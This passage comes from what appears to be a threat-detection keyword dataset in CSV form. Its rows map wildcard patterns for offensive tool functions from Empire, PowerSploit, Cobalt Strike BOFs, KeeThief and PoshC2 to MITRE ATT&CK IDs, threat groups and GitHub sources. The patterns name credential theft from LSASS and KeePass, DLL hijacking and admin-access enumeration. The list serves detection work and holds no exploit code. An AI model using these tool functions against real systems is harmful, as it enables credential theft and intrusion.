Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*findinterestingdomainsharefile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Find-InterestingDomainShareFile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Find-InterestingDomainShareFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*find-interestingfile -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*Find-InterestingFile*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Find-KeePassconfig*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Find-KeePassconfig*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z
-*Find-LocalAdminAccess -Verbose*,greyware_tool_keyword,powershell,Find machine where the user has admin privs,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*findlocaladminaccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z
-*findlocaladminaccess*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Find-LocalAdminAccess*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement Enumeration With PowerView,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Find-LocalAdminAccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z
-*Find-LocalAdminAccess*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z
-*Find-LocalAdminAccess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Find-LocalAdminAccess*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Find-LogonScriptCredentials -LogonScripts*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z
-*Find-LogonScriptCredentials.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z
-*FindModule *.dll*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,0,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z
-*FindObjects-BOF*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,1,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z
-*Find-PathDLLHijack*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Find-PathDLLHijack*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Find-ProcessDLLHijack*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Find-ProcessDLLHijack*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*FindProcessTokenAndDuplicate*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z
-*FindProcHandle *lsass*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,0,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z
-*Find-ProtectionSoftware*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Find-PSScriptsInPSAppLog*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Find-PSServiceAccounts.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
